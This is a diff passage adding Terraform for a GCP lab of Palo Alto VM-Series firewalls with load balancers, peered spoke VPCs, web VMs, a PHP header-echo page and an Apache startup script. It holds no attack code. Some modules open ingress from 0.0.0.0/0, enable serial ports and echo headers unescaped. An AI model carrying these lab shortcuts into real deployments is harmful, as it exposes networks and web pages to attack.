+} + +#----------------------------------------------------------------------------------------------- +# Create inbound firewalls +module "fw_inbound" { + source = "./modules/vmseries/" + names = var.fw_names_inbound + zones = [ + data.google_compute_zones.available.names[0], + data.google_compute_zones.available.names[1] + ] + subnetworks = [ + module.vpc_untrust.subnetwork_self_link[0], + module.vpc_mgmt.subnetwork_self_link[0], + module.vpc_trust.subnetwork_self_link[0] + ] + machine_type = var.fw_machine_type + bootstrap_bucket = module.bootstrap_inbound.bucket_name + mgmt_interface_swap = "enable" + ssh_key = fileexists(var.public_key_path) ? "admin:${file(var.public_key_path)}" : "" + image = "${var.fw_image}-${var.fw_panos}" + nic0_public_ip = true + nic1_public_ip = true + nic2_public_ip = false + create_instance_group = true + + dependencies = [ + module.bootstrap_inbound.completion, + ] +} + +#----------------------------------------------------------------------------------------------- +# Create public load balancer +module "glb" { + source = "./modules/glb/" + name = var.glb_name + backends = { + "0" = [ + { + group = module.fw_inbound.instance_group[0] + balancing_mode = null + capacity_scaler = null + description = null + max_connections = null + max_connections_per_instance = null + max_rate = null + max_rate_per_instance = null + max_utilization = null + }, + { + group = module.fw_inbound.instance_group[1] + balancing_mode = null + capacity_scaler = null + description = null + max_connections = null + max_connections_per_instance = null + max_rate = null + max_rate_per_instance = null + max_utilization = null + } + ] + } + backend_params = [ + // health check path, port name, port number, timeout seconds. + "/,http,80,10" + ] +} + diff --git a/gcp/adv_peering_4fw_2spoke/fw_outbound.tf b/gcp/adv_peering_4fw_2spoke/fw_outbound.tf new file mode 100644 index 00000000..b97e8281 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/fw_outbound.tf @@ -0,0 +1,95 @@ +#----------------------------------------------------------------------------------------------- +# Create bootstrap bucket for outbound firewalls +module "bootstrap_outbound" { + source = "./modules/gcp_bootstrap/" + bucket_name = "fw-bootstrap-egress" + file_location = "bootstrap_files/fw_outbound/" + config = ["init-cfg.txt", "bootstrap.xml"] + license = ["authcodes"] +} + +#----------------------------------------------------------------------------------------------- +# Create outbound firewalls +module "fw_outbound" { + source = "./modules/vmseries/" + names = var.fw_names_outbound + zones = [ + data.google_compute_zones.available.names[0], + data.google_compute_zones.available.names[1] + ] + subnetworks = [ + module.vpc_trust.subnetwork_self_link[0], + module.vpc_mgmt.subnetwork_self_link[0], + module.vpc_untrust.subnetwork_self_link[0] + ] + machine_type = var.fw_machine_type + bootstrap_bucket = module.bootstrap_outbound.bucket_name + mgmt_interface_swap = "enable" + ssh_key = fileexists(var.public_key_path) ? "admin:${file(var.public_key_path)}" : "" + image = "${var.fw_image}-${var.fw_panos}" + nic0_public_ip = false + nic1_public_ip = true + nic2_public_ip = true + create_instance_group = true + + dependencies = [ + module.bootstrap_outbound.completion, + ] +} + +#----------------------------------------------------------------------------------------------- +# Create 2 internal load balancers. LB-1 is A/A for internet. LB-2 is A/P for e-w. +module "ilb" { + source = "./modules/ilb/" + name = var.ilb_name + subnetworks = [module.vpc_trust.subnetwork_self_link[0]] + all_ports = true + ports = [] + health_check_port = "22" + + backends = { + "0" = [ + { + group = module.fw_outbound.instance_group[0] + failover = false + }, + { + group = module.fw_outbound.instance_group[1] + failover = false + } + ], + "1" = [ + { + group = module.fw_outbound.instance_group[0] + failover = false + }, + { + group = module.fw_outbound.instance_group[1] + failover = true + } + ] + } + providers = { + google = google-beta + } +} + +#----------------------------------------------------------------------------------------------- +# Create default route to internal LB. Route will be exported to spokes via GCP peering. +resource "google_compute_route" "default" { + name = "${var.ilb_name}-default" + provider = google-beta + dest_range = "0.0.0.0/0" + network = module.vpc_trust.vpc_self_link + next_hop_ilb = module.ilb.forwarding_rule[0] + priority = 99 +} + +resource "google_compute_route" "eastwest" { + name = "${var.ilb_name}-eastwest" + provider = google-beta + dest_range = "10.10.0.0/16" + network = module.vpc_trust.vpc_self_link + next_hop_ilb = module.ilb.forwarding_rule[1] + priority = 99 +} diff --git a/gcp/adv_peering_4fw_2spoke/fw_vpc.tf b/gcp/adv_peering_4fw_2spoke/fw_vpc.tf new file mode 100644 index 00000000..a1f096eb --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/fw_vpc.tf @@ -0,0 +1,35 @@ +#----------------------------------------------------------------------------------------------- +# Create firewall VPCs & subnets +module "vpc_mgmt" { + source = "./modules/vpc/" + + vpc = var.mgmt_vpc + subnets = var.mgmt_subnet + cidrs = var.mgmt_cidr + regions = [var.region] + allowed_sources = var.mgmt_sources + allowed_protocol = "TCP" + allowed_ports = ["443", "22"] +} + +module "vpc_untrust" { + source = "./modules/vpc/" + + vpc = var.untrust_vpc + subnets = var.untrust_subnet + cidrs = var.untrust_cidr + regions = [var.region] + allowed_sources = ["0.0.0.0/0"] +} + +module "vpc_trust" { + source = "./modules/vpc/" + + vpc = var.trust_vpc + subnets = var.trust_subnet + cidrs = var.trust_cidr + regions = [var.region] + allowed_sources = ["0.0.0.0/0"] + delete_default_route = true +} + diff --git a/gcp/adv_peering_4fw_2spoke/guide.pdf b/gcp/adv_peering_4fw_2spoke/guide.pdf new file mode 100644 index 00000000..8b4b69e6 Binary files /dev/null and b/gcp/adv_peering_4fw_2spoke/guide.pdf differ diff --git a/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/main.tf b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/main.tf new file mode 100644 index 00000000..a93e7956 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/main.tf @@ -0,0 +1,85 @@ +locals { + bucket_name = join("", [var.bucket_name, random_string.randomstring.result]) +} +resource "random_string" "randomstring" { + length = 25 + min_lower = 15 + min_numeric = 10 + special = false +} + +resource "google_storage_bucket" "bootstrap" { + name = local.bucket_name + force_destroy = true +} + +resource "google_storage_bucket_object" "config_full" { + count = length(var.config) > 0 ? length(var.config) : "0" + name = "config/${element(var.config, count.index)}" + source = "${var.file_location}${element(var.config, count.index)}" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "content_full" { + count = length(var.content) > 0 ? length(var.content) : "0" + name = "content/${element(var.content, count.index)}" + source = "${var.file_location}${element(var.content, count.index)}" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "license_full" { + count = length(var.license) > 0 ? length(var.license) : "0" + name = "license/${element(var.license, count.index)}" + source = "${var.file_location}${element(var.license, count.index)}" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "software_full" { + count = length(var.software) > 0 ? length(var.software) : "0" + name = "software/${element(var.software, count.index)}" + source = "${var.file_location}${element(var.software, count.index)}" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "config_empty" { + count = length(var.config) == 0 ? 1 : 0 + name = "config/" + content = "config/" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "content_empty" { + count = length(var.content) == 0 ? 1 : 0 + name = "content/" + content = "content/" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "license_empty" { + count = length(var.license) == 0 ? 1 : 0 + name = "license/" + content = "license/" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "software_empty" { + count = length(var.software) == 0 ? 1 : 0 + name = "software/" + content = "software/" + bucket = google_storage_bucket.bootstrap.name +} + +resource "null_resource" "dependency_setter" { + depends_on = [ + google_storage_bucket.bootstrap, + google_storage_bucket_object.config_full, + google_storage_bucket_object.content_full, + google_storage_bucket_object.license_full, + google_storage_bucket_object.software_full, + google_storage_bucket_object.config_empty, + google_storage_bucket_object.content_empty, + google_storage_bucket_object.license_empty, + google_storage_bucket_object.software_empty, + ] +} + diff --git a/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/outputs.tf new file mode 100644 index 00000000..3697edba --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/outputs.tf @@ -0,0 +1,8 @@ +output "completion" { + value = null_resource.dependency_setter.id +} + +output "bucket_name" { + value = google_storage_bucket.bootstrap.name +} + diff --git a/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/variables.tf new file mode 100644 index 00000000..ebe6f1de --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/variables.tf @@ -0,0 +1,24 @@ +variable "bucket_name" { +} + +variable "file_location" { +} + +variable "config" { + type = list(string) + default = [] +} + +variable "content" { + type = list(string) + default = [] +} + +variable "license" { + type = list(string) + default = [] +} + +variable "software" { + default = [] +} diff --git a/gcp/adv_peering_4fw_2spoke/modules/glb/main.tf b/gcp/adv_peering_4fw_2spoke/modules/glb/main.tf new file mode 100644 index 00000000..bbfa03d6 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/glb/main.tf @@ -0,0 +1,89 @@ +resource "google_compute_global_forwarding_rule" "http" { + count = var.http_forward ? 1 : 0 + name = "${var.name}-http" + target = google_compute_target_http_proxy.default[0].self_link + ip_address = google_compute_global_address.default.address + port_range = "80" +} + +resource "google_compute_global_forwarding_rule" "https" { + count = var.ssl ? 1 : 0 + name = "${var.name}-https" + target = google_compute_target_https_proxy.default[0].self_link + ip_address = google_compute_global_address.default.address + port_range = "443" +} + +resource "google_compute_global_address" "default" { + name = "${var.name}-address" + ip_version = var.ip_version +} + +# HTTP proxy when ssl is false +resource "google_compute_target_http_proxy" "default" { + count = var.http_forward ? 1 : 0 + name = "${var.name}-http-proxy" + url_map = compact( + concat([ + var.url_map], google_compute_url_map.default.*.self_link), + )[0] +} +# HTTPS proxy when ssl is true +resource "google_compute_target_https_proxy" "default" { + count = var.ssl ? 1 : 0 + name = "${var.name}-https-proxy" + url_map = compact( + concat([ + var.url_map], google_compute_url_map.default.*.self_link), )[0] + ssl_certificates = compact(concat(var.ssl_certificates, google_compute_ssl_certificate.default.*.self_link, ), ) +} + +resource "google_compute_ssl_certificate" "default" { + count = var.ssl && ! var.use_ssl_certificates ? 1 : 0 + name_prefix = "${var.name}-certificate" + private_key = var.private_key + certificate = var.certificate + + lifecycle { + create_before_destroy = true + } +} + +resource "google_compute_url_map" "default" { + count = var.create_url_map ? 1 : 0 + name = "${var.name}" + default_service = google_compute_backend_service.default[0].self_link +} + +resource "google_compute_backend_service" "default" { + count = length(var.backend_params) + name = "${var.name}-${count.index}" + port_name = split(",", var.backend_params[count.index])[1] + protocol = var.backend_protocol + timeout_sec = split(",", var.backend_params[count.index])[3] + dynamic "backend" { + for_each = var.backends[count.index] + content { + balancing_mode = lookup(backend.value, "balancing_mode") + capacity_scaler = lookup(backend.value, "capacity_scaler") + description = lookup(backend.value, "description") + group = lookup(backend.value, "group") + max_connections = lookup(backend.value, "max_connections") + max_connections_per_instance = lookup(backend.value, "max_connections_per_instance") + max_rate = lookup(backend.value, "max_rate") + max_rate_per_instance = lookup(backend.value, "max_rate_per_instance") + max_utilization = lookup(backend.value, "max_utilization") + } + } + health_checks = [ + google_compute_http_health_check.default[count.index].self_link] + security_policy = var.security_policy + enable_cdn = var.cdn +} + +resource "google_compute_http_health_check" "default" { + count = length(var.backend_params) + name = "${var.name}-check-${count.index}" + request_path = split(",", var.backend_params[count.index])[0] + port = split(",", var.backend_params[count.index])[2] +} diff --git a/gcp/adv_peering_4fw_2spoke/modules/glb/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/glb/outputs.tf new file mode 100644 index 00000000..3c1a64f7 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/glb/outputs.tf @@ -0,0 +1,4 @@ +output "address" { + value = google_compute_global_address.default.address +} + diff --git a/gcp/adv_peering_4fw_2spoke/modules/glb/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/glb/variables.tf new file mode 100644 index 00000000..742bedfb --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/glb/variables.tf @@ -0,0 +1,95 @@ +variable "ip_version" { + description = "IP version for the Global address (IPv4 or v6) - Empty defaults to IPV4" + type = string + default = "" +} + +variable "name" { + description = "Name for the forwarding rule and prefix for supporting resources" + type = string +} + +variable "backends" { + description = "Map backend indices to list of backend maps." + type = map(list(object({ + group = string + balancing_mode = string + capacity_scaler = number + description = string + max_connections = number + max_connections_per_instance = number + max_rate = number + max_rate_per_instance = number + max_utilization = number + }))) +} + +variable "backend_params" { + description = "Comma-separated encoded list of parameters in order: health check path, service port name, service port, backend timeout seconds" + type = list(string) +} + +variable "backend_protocol" { + description = "The protocol with which to talk to the backend service" + default = "HTTP" +} + +variable "create_url_map" { + description = "Set to `false` if url_map variable is provided." + type = bool + default = true +} + +variable "url_map" { + description = "The url_map resource to use. Default is to send all traffic to first backend." + type = string + default = "" +} + +variable "http_forward" { + description = "Set to `false` to disable HTTP port 80 forward" + type = bool + default = true +} + +variable "ssl" { + description = "Set to `true` to enable SSL support, requires variable `ssl_certificates` - a list of self_link certs" + type = bool + default = false +} + +variable "private_key" { + description = "Content of the private SSL key. Required if `ssl` is `true` and `ssl_certificates` is empty." + type = string + default = "" +} + +variable "certificate" { + description = "Content of the SSL certificate. Required if `ssl` is `true` and `ssl_certificates` is empty." + type = string + default = "" +} + +variable "use_ssl_certificates" { + description = "If true, use the certificates provided by `ssl_certificates`, otherwise, create cert from `private_key` and `certificate`" + type = bool + default = false +} + +variable "ssl_certificates" { + description = "SSL cert self_link list. Required if `ssl` is `true` and no `private_key` and `certificate` is provided." + type = list(string) + default = [] +} + +variable "security_policy" { + description = "The resource URL for the security policy to associate with the backend service" + type = string + default = "" +} + +variable "cdn" { + description = "Set to `true` to enable cdn on backend." + type = bool + default = false +} \ No newline at end of file diff --git a/gcp/adv_peering_4fw_2spoke/modules/ilb/main.tf b/gcp/adv_peering_4fw_2spoke/modules/ilb/main.tf new file mode 100755 index 00000000..fee6e098 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/ilb/main.tf @@ -0,0 +1,33 @@ +resource "google_compute_health_check" "default" { + name = "${var.name}-check-0" + + tcp_health_check { + port = var.health_check_port + } +} +resource "google_compute_region_backend_service" "default" { + count = length(var.backends) + name = "${var.name}-${count.index}" + health_checks = [google_compute_health_check.default.self_link] + + dynamic "backend" { + for_each = var.backends[count.index] + content { + group = lookup(backend.value, "group") + failover = lookup(backend.value, "failover") + } + } + session_affinity = "NONE" +} + +resource "google_compute_forwarding_rule" "default" { + count = length(var.backends) + name = "${var.name}-all-${count.index}" + load_balancing_scheme = "INTERNAL" + ip_address = var.ip_address + ip_protocol = var.ip_protocol + all_ports = var.all_ports + ports = var.ports + subnetwork = var.subnetworks[0] + backend_service = google_compute_region_backend_service.default[count.index].self_link +} diff --git a/gcp/adv_peering_4fw_2spoke/modules/ilb/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/ilb/outputs.tf new file mode 100644 index 00000000..2e1b10ef --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/ilb/outputs.tf @@ -0,0 +1,4 @@ +output "forwarding_rule" { + value = google_compute_forwarding_rule.default.*.self_link +} + diff --git a/gcp/adv_peering_4fw_2spoke/modules/ilb/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/ilb/variables.tf new file mode 100644 index 00000000..f6bbeb80 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/ilb/variables.tf @@ -0,0 +1,33 @@ +variable "name" { +} + +variable "health_check_port" { + default = "22" +} + +variable "backends" { + description = "Map backend indices to list of backend maps." + type = map(list(object({ + group = string + failover = bool + }))) +} + +variable "subnetworks" { + type = list(string) +} + +variable "ip_address" { + default = null +} + +variable "ip_protocol" { + default = "TCP" +} +variable "all_ports" { + type = bool +} +variable "ports" { + type = list(string) + default = [] +} diff --git a/gcp/adv_peering_4fw_2spoke/modules/vm/main.tf b/gcp/adv_peering_4fw_2spoke/modules/vm/main.tf new file mode 100644 index 00000000..2f42125b --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/vm/main.tf @@ -0,0 +1,45 @@ +resource "google_compute_instance" "default" { + count = length(var.names) + name = element(var.names, count.index) + machine_type = var.machine_type + zone = element(var.zones, count.index) + can_ip_forward = true + allow_stopping_for_update = true + metadata_startup_script = var.startup_script + + metadata = { + serial-port-enable = true + ssh-keys = var.ssh_key + } + + network_interface { + subnetwork = element(var.subnetworks, count.index) + } + + boot_disk { + initialize_params { + image = var.image + } + } + + service_account { + scopes = var.scopes + } +} + + +resource "google_compute_instance_group" "default" { + count = var.create_instance_group ? length(var.names) : 0 + name = "${element(var.names, count.index)}-${element(var.zones, count.index)}-ig" + zone = element(var.zones, count.index) + instances = [google_compute_instance.default[count.index].self_link] + + named_port { + name = "http" + port = "80" + } + + lifecycle { + create_before_destroy = true + } +} diff --git a/gcp/adv_peering_4fw_2spoke/modules/vm/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/vm/outputs.tf new file mode 100644 index 00000000..a5c49887 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/vm/outputs.tf @@ -0,0 +1,11 @@ +output "vm_names" { + value = google_compute_instance.default.*.name +} + +output "vm_self_link" { + value = google_compute_instance.default.*.self_link +} + +output "instance_group" { + value = google_compute_instance_group.default.*.self_link +} diff --git a/gcp/adv_peering_4fw_2spoke/modules/vm/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/vm/variables.tf new file mode 100644 index 00000000..102808ff --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/vm/variables.tf @@ -0,0 +1,43 @@ +variable "names" { + type = list(string) +} + +variable "machine_type" { +} +variable "create_instance_group" { + type = bool + default = false +} + +variable "instance_group_names" { + type = list(string) + default = ["vmseries-instance-group"] +} +variable "zones" { + type = list(string) +} +variable "ssh_key" { + default = "" +} +variable "image" { +} + +variable "subnetworks" { + type = list(string) +} + +variable "scopes" { + type = list(string) + + default = [ + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] +} + +variable "startup_script" { + default = "" +} + diff --git a/gcp/adv_peering_4fw_2spoke/modules/vmseries/main.tf b/gcp/adv_peering_4fw_2spoke/modules/vmseries/main.tf new file mode 100644 index 00000000..c74ee4fa --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/vmseries/main.tf @@ -0,0 +1,83 @@ +resource "null_resource" "dependency_getter" { + provisioner "local-exec" { + command = "echo ${length(var.dependencies)}" + } +} + +resource "google_compute_instance" "vmseries" { + count = length(var.names) + name = element(var.names, count.index) + machine_type = var.machine_type + zone = element(var.zones, count.index) + min_cpu_platform = var.cpu_platform + can_ip_forward = true + allow_stopping_for_update = true + tags = var.tags + + metadata = { + mgmt-interface-swap = var.mgmt_interface_swap + vmseries-bootstrap-gce-storagebucket = var.bootstrap_bucket + serial-port-enable = true + ssh-keys = var.ssh_key + } + + service_account { + scopes = var.scopes + } + + network_interface { + + dynamic "access_config" { + for_each = var.nic0_public_ip ? [""] : [] + content {} + } + network_ip = element(var.nic0_ip, count.index) + subnetwork = var.subnetworks[0] + } + + network_interface { + dynamic "access_config" { + for_each = var.nic1_public_ip ? [""] : [] + content {} + } + network_ip = element(var.nic1_ip, count.index) + subnetwork = var.subnetworks[1] + } + + network_interface { + dynamic "access_config" { + for_each = var.nic2_public_ip ? [""] : [] + content {} + } + network_ip = element(var.nic2_ip, count.index) + subnetwork = var.subnetworks[2] + } + + boot_disk { + initialize_params { + image = var.image + type = var.disk_type + } + } + + depends_on = [ + null_resource.dependency_getter + ] +} + +resource "google_compute_instance_group" "vmseries" { + count = var.create_instance_group ? length(var.names) : 0 + name = "${element(var.names, count.index)}-${element(var.zones, count.index)}-ig" + zone = element(var.zones, count.index) + instances = [google_compute_instance.vmseries[count.index].self_link] + + named_port { + name = "http" + port = "80" + } + + lifecycle { + create_before_destroy = true + } +} + diff --git a/gcp/adv_peering_4fw_2spoke/modules/vmseries/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/vmseries/outputs.tf new file mode 100644 index 00000000..01e5f41b --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/vmseries/outputs.tf @@ -0,0 +1,24 @@ +output "vm_names" { + value = google_compute_instance.vmseries.*.name +} + +output "vm_self_link" { + value = google_compute_instance.vmseries.*.self_link +} + +output "instance_group" { + value = google_compute_instance_group.vmseries.*.self_link +} + +output "nic0_public_ip" { + value = var.nic0_public_ip ? google_compute_instance.vmseries.*.network_interface.0.access_config.0.nat_ip : [] +} + +output "nic1_public_ip" { + value = var.nic1_public_ip ? google_compute_instance.vmseries.*.network_interface.1.access_config.0.nat_ip : [] +} + +output "nic2_public_ip" { + value = var.nic2_public_ip ? google_compute_instance.vmseries.*.network_interface.2.access_config.0.nat_ip : [] +} + diff --git a/gcp/adv_peering_4fw_2spoke/modules/vmseries/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/vmseries/variables.tf new file mode 100644 index 00000000..a10b4dbe --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/vmseries/variables.tf @@ -0,0 +1,102 @@ +variable "subnetworks" { + type = list(string) +} + +variable "names" { + type = list(string) +} + +variable "machine_type" { +} + +variable "zones" { + type = list(string) +} + +variable "cpu_platform" { + default = "Intel Broadwell" +} +variable "disk_type" { + default = "pd-ssd" + #default = "pd-standard" +} +variable "bootstrap_bucket" { + default = "" +} + +variable "ssh_key" { + default = "" +} + +variable "public_lb_create" { + default = false +} + +variable "scopes" { + type = list(string) + + default = [ + "https://www.googleapis.com/auth/compute.readonly", + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] +} + +variable "image" { +} + +variable "tags" { + type = list(string) + default = [] +} + +variable "create_instance_group" { + type = bool + default = false +} + +variable "instance_group_names" { + type = list(string) + default = ["vmseries-instance-group"] +} + +variable "dependencies" { + type = list(string) + default = [] +} + +variable "nic0_ip" { + type = list(string) + default = [""] +} + +variable "nic1_ip" { + type = list(string) + default = [""] +} + +variable "nic2_ip" { + type = list(string) + default = [""] +} + +variable "mgmt_interface_swap" { + default = "" +} + +variable "nic0_public_ip" { + type = bool + default = false +} + +variable "nic1_public_ip" { + type = bool + default = false +} + +variable "nic2_public_ip" { + type = bool + default = false +} diff --git a/gcp/adv_peering_4fw_2spoke/modules/vpc/main.tf b/gcp/adv_peering_4fw_2spoke/modules/vpc/main.tf new file mode 100644 index 00000000..0c614e1d --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/vpc/main.tf @@ -0,0 +1,27 @@ +resource "google_compute_network" "default" { + name = var.vpc + delete_default_routes_on_create = var.delete_default_route + auto_create_subnetworks = false +} + +resource "google_compute_subnetwork" "default" { + count = length(var.subnets) + name = element(var.subnets, count.index) + ip_cidr_range = element(var.cidrs, count.index) + region = element(var.regions, count.index) + network = google_compute_network.default.self_link +} + +resource "google_compute_firewall" "default" { + count = length(var.allowed_sources) != 0 ? 1 : 0 + name = "${google_compute_network.default.name}-ingress" + network = google_compute_network.default.self_link + direction = "INGRESS" + source_ranges = var.allowed_sources + + allow { + protocol = var.allowed_protocol + ports = var.allowed_ports + } +} + diff --git a/gcp/adv_peering_4fw_2spoke/modules/vpc/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/vpc/outputs.tf new file mode 100644 index 00000000..e92488eb --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/vpc/outputs.tf @@ -0,0 +1,24 @@ +output "subnetwork_id" { + value = google_compute_subnetwork.default.*.id +} + +output "subnetwork_name" { + value = google_compute_subnetwork.default.*.name +} + +output "subnetwork_self_link" { + value = google_compute_subnetwork.default.*.self_link +} + +output "vpc_name" { + value = google_compute_network.default.*.name +} + +output "vpc_id" { + value = google_compute_network.default.*.id[0] +} + +output "vpc_self_link" { + value = google_compute_network.default.*.self_link[0] +} + diff --git a/gcp/adv_peering_4fw_2spoke/modules/vpc/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/vpc/variables.tf new file mode 100644 index 00000000..faccda44 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/vpc/variables.tf @@ -0,0 +1,33 @@ +variable "vpc" { +} + +variable "subnets" { + type = list(string) +} + +variable "cidrs" { + type = list(string) +} + +variable "regions" { + type = list(string) +} + +variable "allowed_sources" { + type = list(string) + default = [] +} + +variable "allowed_protocol" { + default = "all" +} + +variable "allowed_ports" { + type = list(string) + default = [] +} + +variable "delete_default_route" { + default = "false" +} + diff --git a/gcp/adv_peering_4fw_2spoke/outputs.tf b/gcp/adv_peering_4fw_2spoke/outputs.tf new file mode 100644 index 00000000..e81fb61e --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/outputs.tf @@ -0,0 +1,30 @@ +#----------------------------------------------------------------------------------------------- +# Outputs +output "GLB-ADDR" { + value = "http://${module.glb.address}" +} + +output "MGMT-FW1" { + value = "https://${module.fw_inbound.nic1_public_ip[0]}" +} + +output "MGMT-FW2" { + value = "https://${module.fw_inbound.nic1_public_ip[1]}" +} + +output "MGMT-FW3" { + value = "https://${module.fw_outbound.nic1_public_ip[0]}" +} + +output "MGMT-FW4" { + value = "https://${module.fw_outbound.nic1_public_ip[1]}" +} + +output "SSH-TO-SPOKE1" { + value = "ssh ${var.spoke_user}@${module.fw_inbound.nic0_public_ip[0]} -p 221 -i ${replace(var.public_key_path, ".pub", "")}" +} + +output "SSH-TO-SPOKE2" { + value = "ssh ${var.spoke_user}@${module.fw_inbound.nic0_public_ip[0]} -p 222 -i ${replace(var.public_key_path, ".pub", "")}" +} + diff --git a/gcp/adv_peering_4fw_2spoke/project.tf b/gcp/adv_peering_4fw_2spoke/project.tf new file mode 100644 index 00000000..835af2dc --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/project.tf @@ -0,0 +1,18 @@ +terraform { + required_version = ">= 0.12" +} + +provider "google" { + # credentials = var.auth_file + project = var.project_id + region = var.region +} + +provider "google-beta" { + # credentials = var.auth_file + project = var.project_id + region = var.region + version = "> 2.13.0" +} + +data "google_compute_zones" "available" {} \ No newline at end of file diff --git a/gcp/adv_peering_4fw_2spoke/scripts/showheaders.php b/gcp/adv_peering_4fw_2spoke/scripts/showheaders.php new file mode 100644 index 00000000..19c37318 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/scripts/showheaders.php @@ -0,0 +1,62 @@ + + SOURCE & DESTINATION ADDRESSES +
'; +echo ''. "INTERVAL" .': '. $time .'
'; +$localIPAddress = getHostByName(getHostName()); +$sourceIPAddress = getRealIpAddr(); +echo ''. "SOURCE IP" .': '. $sourceIPAddress .'
'; +echo ''. "LOCAL IP" .': '. $localIPAddress .'
'; + +$vm_name = gethostname(); +echo ''. "VM NAME" .': '. $vm_name .'
'; +echo ''. '
'; +echo ' + HEADER INFORMATION +
'; +/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */ +foreach ($_SERVER as $header => $value) { + if (substr($header, 0, 5) == 'HTTP_') { + /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */ + $clean_header = strtolower(substr($header, 5, strlen($header))); + + /* Replace underscores by the dashes, as the browser sends them */ + $clean_header = str_replace('_', '-', $clean_header); + + /* Cleanup: standard headers are first-letter uppercase */ + $clean_header = ucwords($clean_header, " \t\r\n\f\v-"); + + /* And show'm */ + echo ''. $header .': '. $value .'
'; + } +} +?> diff --git a/gcp/adv_peering_4fw_2spoke/scripts/webserver-startup.sh b/gcp/adv_peering_4fw_2spoke/scripts/webserver-startup.sh new file mode 100644 index 00000000..94f78467 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/scripts/webserver-startup.sh @@ -0,0 +1,8 @@ +#!/bin/bash +until sudo apt-get update; do echo "Retrying"; sleep 2; done +until sudo apt-get install -y php; do echo "Retrying"; sleep 2; done +until sudo apt-get install -y apache2; do echo "Retrying"; sleep 2; done +until sudo apt-get install -y libapache2-mod-php; do echo "Retrying"; sleep 2; done +until sudo rm -f /var/www/html/index.html; do echo "Retrying"; sleep 2; done +until sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_4fw_2spoke/scripts/showheaders.php; do echo "Retrying"; sleep 2; done +until sudo systemctl restart apache2; do echo "Retrying"; sleep 2; done \ No newline at end of file diff --git a/gcp/adv_peering_4fw_2spoke/spokes.tf b/gcp/adv_peering_4fw_2spoke/spokes.tf new file mode 100644 index 00000000..ce369362 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/spokes.tf @@ -0,0 +1,112 @@ +#----------------------------------------------------------------------------------------------- +# Create spoke2 vpc with 2 web VMs (with internal LB). Create peer link with trust VPC. +module "vpc_spoke1" { + source = "./modules/vpc/" + vpc = var.spoke1_vpc + subnets = var.spoke1_subnets + cidrs = var.spoke1_cidrs + regions = [var.region] + allowed_sources = ["0.0.0.0/0"] + delete_default_route = true +} + +module "vm_spoke1" { + source = "./modules/vm/" + names = var.spoke1_vms + zones = [ + data.google_compute_zones.available.names[0], + data.google_compute_zones.available.names[1] + ] + subnetworks = [module.vpc_spoke1.subnetwork_self_link[0]] + machine_type = "f1-micro" + image = "ubuntu-os-cloud/ubuntu-1604-lts" + create_instance_group = true + ssh_key = fileexists(var.public_key_path) ? "${var.spoke_user}:${file(var.public_key_path)}" : "" + startup_script = file("${path.module}/scripts/webserver-startup.sh") +} + +module "ilb_web" { + source = "./modules/ilb/" + name = var.spoke1_ilb + subnetworks = [module.vpc_spoke1.subnetwork_self_link[0]] + all_ports = false + ports = ["80"] + health_check_port = "80" + ip_address = var.spoke1_ilb_ip + backends = { + "0" = [ + { + group = 